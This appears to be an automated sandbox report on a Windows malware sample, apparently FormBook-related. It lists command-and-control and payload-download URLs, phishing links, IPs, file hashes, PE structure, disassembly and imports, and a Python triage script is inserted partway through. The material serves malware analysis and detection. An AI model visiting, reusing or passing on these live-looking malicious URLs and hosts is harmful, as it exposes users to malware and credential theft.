                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • VT rate limit hit for: RO2Y11yOJ7.exe
Time | Type | Description
09:50:38 | API Interceptor | 5400914x Sleep call for process: Atuserer.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
192.64.118.221 | ByuoedHi2e.exe | Get hash | malicious | FormBook | Browse | www.elarac.top/hcv9/
192.64.118.221 | SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exe | Get hash | malicious | FormBook | Browse | www.oporio.xyz/wsmp/
192.64.118.221 | Technical Datasheet and Specification_PDF.exe | Get hash | malicious | Unknown | Browse | www.elarac.top/hcv9/?urk=NXuT&0dk=i0zpRIKfBsqaPcaPDER8nUxzZRFDCipl8J5u88RgJ30Dq0aXm679zDMOUT0OK9asUr9KPAhfInTfMeTLGuc3GC/U5s2GEaYqyn9930FNTUtQmFVEKg==
192.64.118.221 | PR. No.1599-Rev.2.exe | Get hash | malicious | Unknown | Browse | www.dariuz.info/fr03/
168.76.221.252 | debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe | Get hash | malicious | FormBook | Browse | www.5hdgb2p9a.buzz/lxjv/
188.114.96.3 | ByuoedHi2e.exe | Get hash | malicious | FormBook | Browse | www.rihanaroly.sbs/othk/
188.114.96.3 | Aviso de pago.xla.xlsx | Get hash | malicious | HTMLPhisher | Browse | paste.ee/d/PAg0l
188.114.96.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | filetransfer.io/data-package/8shpYIj5/download
188.114.96.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | filetransfer.io/data-package/CXujY04Y/download
188.114.96.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | filetransfer.io/data-package/O2nyeCCn/download
188.114.96.3 | 2rI5YEg7uo.exe | Get hash | malicious | FormBook | Browse | www.evoolixyppuk.shop/7gfa/?pP=OC/NqFuXSoQKcxJzIwbC8gc6YWk63HA88JkIsR5MBtbsuoT1qNc3mE+usci2f4e+0fIXV/Px1LgbGc4SbpFIftMOxDoszWQURSPAVqq521dqxxqHUw==&UJO=A6MH4FUp
188.114.96.3 | createdbestthingswithgoodnewswithgreatfriendship.hta | Get hash | malicious | Cobalt Strike, HTMLPhisher | Browse | paste.ee/d/PAg0l
188.114.96.3 | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | filetransfer.io/data-package/O7tfWEfj/download
188.114.96.3 | NIlfETZ9aE.exe | Get hash | malicious | FormBook | Browse | www.timizoasisey.shop/agaq/
188.114.96.3 | https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.com | Get hash | malicious | HTMLPhisher | Browse | uniteseoul.com/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.jllllbx.top | SHIPPING DOC_20241107.exe | Get hash | malicious | FormBook | Browse | 156.234.28.94
www.jllllbx.top | INVOICE_PO# PUO202300054520249400661.exe | Get hash | malicious | FormBook | Browse | 156.234.28.94
www.jllllbx.top | HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe | Get hash | malicious | FormBook | Browse | 156.234.28.94
www.jllllbx.top | OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exe | Get hash | malicious | FormBook | Browse | 156.234.28.94
www.tingba.sbs | BkZqIS5vlv.exe | Get hash | malicious | FormBook | Browse | 104.21.22.22
www.tingba.sbs | NIlfETZ9aE.exe | Get hash | malicious | FormBook | Browse | 104.21.22.22
www.5hdgb2p9a.buzz | debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe | Get hash | malicious | FormBook | Browse | 168.76.221.252
www.5hdgb2p9a.buzz | A4mmSHCUi2.exe | Get hash | malicious | FormBook | Browse | 168.76.221.252
www.j252mv.site | SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exe | Get hash | malicious | FormBook | Browse | 150.95.254.16
www.j252mv.site | debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe | Get hash | malicious | FormBook | Browse | 150.95.254.16
www.elarac.top | ByuoedHi2e.exe | Get hash | malicious | FormBook | Browse | 192.64.118.221
www.elarac.top | Technical Datasheet and Specification_PDF.exe | Get hash | malicious | Unknown | Browse | 192.64.118.221
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | W1D5wGM20v.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 188.114.96.3
CLOUDFLARENETUS | https://eu.docworkspace.com/d/sIGWvrvOeAYXvpLkG | Get hash | malicious | Unknown | Browse | 104.16.84.69
CLOUDFLARENETUS | Q7oJsypKoV.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
CLOUDFLARENETUS | xz8lxAetNu.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
CLOUDFLARENETUS | Lpjrd6Wxad.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
CLOUDFLARENETUS | khVFdtvf8F.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
CLOUDFLARENETUS | https://app.smartsheet.com/b/form/d72b00b027df4e38a9b052ac176790d8 | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 104.21.5.155
CLOUDFLARENETUS | https://docs.google.com/drawings/d/1L9giD0SHUwqCV6PUyhw5H1o5DG-sAxEzlNLyy8oPIRo/preview?usp=sharing | Get hash | malicious | Unknown | Browse | 104.18.95.41
CLOUDFLARENETUS | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
NAMECHEAP-NETUS | https://login-zendesk-account.servz.com.pk | Get hash | malicious | HTMLPhisher | Browse | 63.250.47.132
NAMECHEAP-NETUS | https://login-zendesk-account.servz.com.pk | Get hash | malicious | HTMLPhisher | Browse | 63.250.47.132
NAMECHEAP-NETUS | https://login-zendesk-account.servz.com.pk | Get hash | malicious | HTMLPhisher | Browse | 63.250.47.132
NAMECHEAP-NETUS | xBzBOQwywT.exe | Get hash | malicious | FormBook | Browse | 199.192.19.19
NAMECHEAP-NETUS | https://google.com:login@login-zendesk-account.servz.com.pk/index.html | Get hash | malicious | HTMLPhisher | Browse | 63.250.47.132
NAMECHEAP-NETUS | gTg6xY6fo2.exe | Get hash | malicious | FormBook | Browse | 162.0.225.218
NAMECHEAP-NETUS | ByuoedHi2e.exe | Get hash | malicious | FormBook | Browse | 192.64.118.221
NAMECHEAP-NETUS | Y7isAhMKal.exe | Get hash | malicious | FormBook | Browse | 162.0.231.203
NAMECHEAP-NETUS | r876789878767.cmd | Get hash | malicious | DBatLoader, FormBook | Browse | 162.0.232.49
ULTRANETSERVICOSEMINTERNETLTDABR | debug.dbg.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 168.72.250.109
ULTRANETSERVICOSEMINTERNETLTDABR | debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe | Get hash | malicious | FormBook | Browse | 168.76.221.252
ULTRANETSERVICOSEMINTERNETLTDABR | arm4.elf | Get hash | malicious | Mirai | Browse | 168.67.62.26
ULTRANETSERVICOSEMINTERNETLTDABR | A4mmSHCUi2.exe | Get hash | malicious | FormBook | Browse | 168.76.221.252
ULTRANETSERVICOSEMINTERNETLTDABR | la.bot.sparc.elf | Get hash | malicious | Unknown | Browse | 168.73.238.77
ULTRANETSERVICOSEMINTERNETLTDABR | splspc.elf | Get hash | malicious | Unknown | Browse | 168.73.238.27
ULTRANETSERVICOSEMINTERNETLTDABR | botnet.sh4.elf | Get hash | malicious | Mirai, Moobot | Browse | 168.66.250.31
ULTRANETSERVICOSEMINTERNETLTDABR | la.bot.mips.elf | Get hash | malicious | Unknown | Browse | 168.66.29.145
ULTRANETSERVICOSEMINTERNETLTDABR | la.bot.mipsel.elf | Get hash | malicious | Unknown | Browse | 168.67.178.57
ULTRANETSERVICOSEMINTERNETLTDABR | sh4.elf | Get hash | malicious | Unknown | Browse | 168.73.239.131
                                                        No context
                                                        No context
                                                        Process:C:\Windows\SysWOW64\Atuserer.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1211596417522893
                                                        Encrypted:false
                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\RO2Y11yOJ7.exe
                                                        File Type:ARC+ archive data
                                                        Category:dropped
                                                        Size (bytes):287744
                                                        Entropy (8bit):7.993704235508897
                                                        Encrypted:true
                                                        SSDEEP:6144:m2UIz4DBraP5i5k+Hbi036TwkpjF+c8KeRf4AK2WLwGzsax:hUBrIi5k+bd3GtSg/20Zp
                                                        MD5:2E92344600175568B7BBE0FD1BC2D0BB
                                                        SHA1:66BCFB5CFB60D3BD2227888BC43663FC2EEA1A08
                                                        SHA-256:652C306B0AD1808C6C0FB3D22811E42329AF39E2737EF026D082E0734FE501BB
                                                        SHA-512:9C1A655A80E7C1DB05CEF32747D0D15F90BF42E81B647ADB6B6923E479EBCD98D191B1F8FBC005C8CFFA91FA10A586AC62B7956040CE3D189BCB49FEF8317FA0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..}..0D0O..>....k.8O....LY...L438WN8LG0D0OQIQ7L438WN8LG0D0O.IQ7B+.6W.1.f.E|.p.9^?.CJ8)J-*.'Q!?&%..Q.J" .%)....q$>S).>5]j8LG0D0O(HX.qTT.j._.zP#.U...,S."...p'W.*...mW+.aQ4&., .D0OQIQ7Ldv8W.9MG..}.QIQ7L438.N:ML1O0O.MQ7L438WN8.S0D0_QIQGH438.N8\G0D2OQOQ7L438WH8LG0D0OQ9U7L638WN8LE0..OQYQ7\438W^8LW0D0OQIA7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D.;41%7L4.iSN8\G0DbKQIA7L438WN8LG0D0OqIQWL438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L
                                                        Process:C:\Users\user\Desktop\RO2Y11yOJ7.exe
                                                        File Type:ARC+ archive data
                                                        Category:dropped
                                                        Size (bytes):287744
                                                        Entropy (8bit):7.993704235508897
                                                        Encrypted:true
                                                        SSDEEP:6144:m2UIz4DBraP5i5k+Hbi036TwkpjF+c8KeRf4AK2WLwGzsax:hUBrIi5k+bd3GtSg/20Zp
                                                        MD5:2E92344600175568B7BBE0FD1BC2D0BB
                                                        SHA1:66BCFB5CFB60D3BD2227888BC43663FC2EEA1A08
                                                        SHA-256:652C306B0AD1808C6C0FB3D22811E42329AF39E2737EF026D082E0734FE501BB
                                                        SHA-512:9C1A655A80E7C1DB05CEF32747D0D15F90BF42E81B647ADB6B6923E479EBCD98D191B1F8FBC005C8CFFA91FA10A586AC62B7956040CE3D189BCB49FEF8317FA0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..}..0D0O..>....k.8O....LY...L438WN8LG0D0OQIQ7L438WN8LG0D0O.IQ7B+.6W.1.f.E|.p.9^?.CJ8)J-*.'Q!?&%..Q.J" .%)....q$>S).>5]j8LG0D0O(HX.qTT.j._.zP#.U...,S."...p'W.*...mW+.aQ4&., .D0OQIQ7Ldv8W.9MG..}.QIQ7L438.N:ML1O0O.MQ7L438WN8.S0D0_QIQGH438.N8\G0D2OQOQ7L438WH8LG0D0OQ9U7L638WN8LE0..OQYQ7\438W^8LW0D0OQIA7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D.;41%7L4.iSN8\G0DbKQIA7L438WN8LG0D0OqIQWL438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.083310287852298
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: RO2Y11yOJ7.exe
File size: 1'324'032 bytes
MD5: 5ffe1ba845fb6e48aae4367ef675444e
SHA1: b45e53f7bc9b7b2805c1bcd62c35f1554ecdc542
SHA256: 12e60b3db1e0cb33c5e66d0c114b8fa1033984e21f3741e97111f41b37a04978
SHA512: 7c4562cb64e420d4642c4f53ff08ed0a7dae0abca394ca3edd8d6c0294ec61247f62695d350c9a72ff0f16861c2d1693e9f3c69ded501c1706e466d1b67765d8
SSDEEP: 24576:pCdxte/80jYLT3U1jfsWatVxttkhrFx5I+0SGTKdHAQQ:Yw80cTsjkWazxttyFxFQKdH2
TLSH: 0A55BF5373CD8374C6B6D873BE59B3119FBB7C314260B8531FA4396A6B81171221EAA3
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
Icon Hash: 2345e87068e84523
Entrypoint: 0x427f4a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x671B854C [Fri Oct 25 11:47:24 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
                                                        Instruction
                                                        call 00007FBD7CB5DC6Dh
                                                        jmp 00007FBD7CB50A34h
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [esp+10h]
                                                        mov ecx, dword ptr [esp+14h]
                                                        mov edi, dword ptr [esp+0Ch]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007FBD7CB50BBAh
                                                        cmp edi, eax
                                                        jc 00007FBD7CB50F1Eh
                                                        bt dword ptr [004C31FCh], 01h
                                                        jnc 00007FBD7CB50BB9h
                                                        rep movsb
                                                        jmp 00007FBD7CB50ECCh
                                                        cmp ecx, 00000080h
                                                        jc 00007FBD7CB50D84h
                                                        mov eax, edi
                                                        xor eax, esi
                                                        test eax, 0000000Fh
                                                        jne 00007FBD7CB50BC0h
                                                        bt dword ptr [004BE324h], 01h
                                                        jc 00007FBD7CB51090h
                                                        bt dword ptr [004C31FCh], 00000000h
                                                        jnc 00007FBD7CB50D5Dh
                                                        test edi, 00000003h
                                                        jne 00007FBD7CB50D6Eh
                                                        test esi, 00000003h
                                                        jne 00007FBD7CB50D4Dh
                                                        bt edi, 02h
                                                        jnc 00007FBD7CB50BBFh
                                                        mov eax, dword ptr [esi]
                                                        sub ecx, 04h
                                                        lea esi, dword ptr [esi+04h]
                                                        mov dword ptr [edi], eax
                                                        lea edi, dword ptr [edi+04h]
                                                        bt edi, 03h
                                                        jnc 00007FBD7CB50BC3h
                                                        movq xmm1, qword ptr [esi]
                                                        sub ecx, 08h
                                                        lea esi, dword ptr [esi+08h]
                                                        movq qword ptr [edi], xmm1
                                                        lea edi, dword ptr [edi+08h]
                                                        test esi, 00000007h
                                                        je 00007FBD7CB50C15h
                                                        bt esi, 03h
                                                        Programming Language:
                                                        • [ASM] VS2013 build 21005
                                                        • [ C ] VS2013 build 21005
                                                        • [C++] VS2013 build 21005
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2013 UPD5 build 40629
                                                        • [RES] VS2013 build 21005
                                                        • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x7ab3c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x142000 | 0x7130 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dd2e | 0x8de00 | c2c2260508750422d20cd5cbb116b146 | False | 0.5729952505506608 | data | 6.675875439961112 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 4513b58651e3d8d87c81a396e5b2f1d1 | False | 0.3353340955284553 | OpenPGP Public Key | 5.760731648769018 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | c2de4a3d214eae7e87c7bfc06bd79775 | False | 0.1017530487804878 | data | 1.1988106744719143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x7ab3c | 0x7ac00 | b55abbe6eba0239262d4a69ef316a5e5 | False | 0.721192400712831 | data | 7.406803163579947 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x142000 | 0x7130 | 0x7200 | 1254908a9a03d2bcf12045d49cd572b9 | False | 0.7703536184210527 | data | 6.782377328042204 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc74a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc75c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.12599077250680232
RT_ICON | 0xd7df0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.19891738490645364
RT_ICON | 0xe1298 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.22195009242144179
RT_ICON | 0xe6720 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.18451818611242324
RT_ICON | 0xea948 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.26130705394190873
RT_ICON | 0xecef0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.26641651031894936
RT_ICON | 0xedf98 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | Great Britain | 0.38688524590163936
RT_ICON | 0xee920 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.43439716312056736
RT_STRING | 0xeed88 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xef31c | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xef9a8 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xefe38 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xf0434 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xf0a90 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xf0ef8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xf1050 | 0x50591 | data | | | 1.0003372783762021
RT_GROUP_ICON | 0x1415e4 | 0x76 | data | English | Great Britain | 0.7627118644067796
RT_GROUP_ICON | 0x14165c | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x141670 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x14174c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
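The data-directory, section and resource tables above can be cross-checked against each other: the "Is in Section" column is nothing more than an RVA range lookup against the section table, and the entropy and ZLIB-complexity columns tell you where compressed or encrypted data lives. The script below is an added example and is not part of the Joe Sandbox report; every constant in it is copied from the three tables above for RO2Y11yOJ7.exe (the resource list is a subset), nothing is read from the binary, and the interpretation of "ZLIB Complexity" as compressed-size over original-size is an assumption about the report's metric.

```python
"""Re-derive the 'Is in Section' column and triage entropy / compressibility.

Added example, not code from the Joe Sandbox report.  All numbers are copied
from the section, data-directory and resource tables of this report for
RO2Y11yOJ7.exe (resource list is a subset); nothing is read from the file.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: float  # Shannon entropy in bits per byte; 8.0 is uniformly random


SECTIONS = [
    Section(".text",  0x1000,   0x8dd2e, 0x8de00, 6.675875439961112),
    Section(".rdata", 0x8f000,  0x2e10e, 0x2e200, 5.760731648769018),
    Section(".data",  0xbe000,  0x8f74,  0x5200,  1.1988106744719143),
    Section(".rsrc",  0xc7000,  0x7ab3c, 0x7ac00, 7.406803163579947),
    Section(".reloc", 0x142000, 0x7130,  0x7200,  6.782377328042204),
]

# Populated data-directory entries from the table above: (name, RVA, size).
DATA_DIRECTORIES = [
    ("IMPORT",      0xba44c,  0x17c),
    ("RESOURCE",    0xc7000,  0x7ab3c),
    ("BASERELOC",   0x142000, 0x7130),
    ("DEBUG",       0x92bc0,  0x1c),
    ("LOAD_CONFIG", 0xa4870,  0x40),
    ("IAT",         0x8f000,  0x884),
]

# Subset of the resource table: (type, RVA, size, ZLIB complexity).
# Assumption: ZLIB complexity is compressed size / original size, so a value
# near 1.0 means zlib could not shrink the blob (already compressed/encrypted).
RESOURCES = [
    ("RT_ICON",       0xc74a0,  0x128,   0.3885135135135135),
    ("RT_STRING",     0xeed88,  0x594,   0.3333333333333333),
    ("RT_RCDATA",     0xf1050,  0x50591, 1.0003372783762021),
    ("RT_GROUP_ICON", 0x14165c, 0x14,    1.15),
    ("RT_MANIFEST",   0x14174c, 0x3ef,   0.5074478649453823),
]


def section_for_rva(rva: int, sections=SECTIONS) -> Optional[Section]:
    """Section whose [VA, VA + VirtualSize) range contains rva, else None."""
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + s.virtual_size:
            return s
    return None


def map_directories(directories=DATA_DIRECTORIES, sections=SECTIONS) -> dict:
    """Reproduce the 'Is in Section' column of the data-directory table.

    A directory whose first and last byte map to different sections, or to
    no section at all, is reported as None: that is the tampered-header case
    a PE loader tolerates but an analyst should not.
    """
    out = {}
    for name, rva, size in directories:
        start = section_for_rva(rva, sections)
        end = section_for_rva(rva + size - 1, sections)
        out[name] = start.name if start is not None and start == end else None
    return out


def high_entropy_sections(sections=SECTIONS, threshold=7.0) -> list:
    """Sections above the entropy threshold: where packed/encrypted data sits."""
    return [s.name for s in sections if s.entropy > threshold]


def incompressible_resources(resources=RESOURCES, min_size=0x1000, min_complexity=0.95):
    """Large resources zlib cannot shrink: first candidates for an embedded payload.

    min_size filters out tiny blobs; a 20-byte RT_GROUP_ICON reads > 1.0 only
    because zlib framing overhead exceeds the data.
    """
    return [(t, rva, size) for t, rva, size, c in resources
            if size >= min_size and c >= min_complexity]


if __name__ == "__main__":
    print(map_directories())
    print(high_entropy_sections())
    print(incompressible_resources())
```

Run against the report's own numbers, the mapping reproduces the "Is in Section" column exactly, `.rsrc` is the only section above 7 bits/byte, and the 0x50591-byte RT_RCDATA entry is the only large resource zlib cannot compress, which is where a triage should start given the report's note that the binary is likely a compiled AutoIt script.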
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
